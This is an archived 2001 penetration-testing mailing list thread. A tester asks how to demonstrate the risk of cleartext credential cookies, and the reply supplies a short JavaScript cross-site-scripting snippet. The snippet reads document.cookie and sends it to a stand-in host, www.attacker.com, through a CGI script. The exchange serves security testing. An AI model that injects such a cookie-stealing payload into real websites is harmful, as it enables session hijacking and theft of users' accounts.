Penetration Testing mailing list archives
Re: Wanted: Script to email cookies
From: "Jeremiah Grossman" <jeremiah () whitehatsec com>
Date: Sat, 1 Dec 2001 18:32:09 +0900
Well. of course there is the ever famous sniffer.... that will see a cookie quite easily.... to move cookies off domains without the aid of a sniffer.... JavaScript has been known the be the most widely used method. something like <SCRIPT> var cookie_data = document.cookie; window.open('http://www.attacker.com/email_the_cookie.pl?cookie_value=cookie _data'); </SCRIPT> Modify to suit your needs... The point is that your using JavaScript to generate an off domain request method passing out the cookie data to a cgi. good. good. Jeremiah Grossman ----- Original Message ----- From: "Joe Brown" <joe_brown () senet-int com> To: <pen-test () securityfocus com> Sent: Friday, November 30, 2001 6:06 PM Subject: Wanted: Script to email cookies
I'm working on a pen test for a web application. After the first time you successfully authenticate, the app stores a cookie with username and password in clear text. I've recently read the archive regarding vulnerable IE browsers revealing cookies. I'd like to go a step farther. Does anyone have a script that will email the cookie? I'd like to craft an email with a link and when a user clicks, it emails the cookie. I want to show the client how dangerous it is to store a clear text cookie. Also, any other method of cookie stealing would be really appreciated. Thanks. Joe --------------------------------------------------------------------------
--
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Wanted: Script to email cookies Joe Brown (Nov 30)
- Re: Wanted: Script to email cookies Jeremiah Grossman (Nov 30)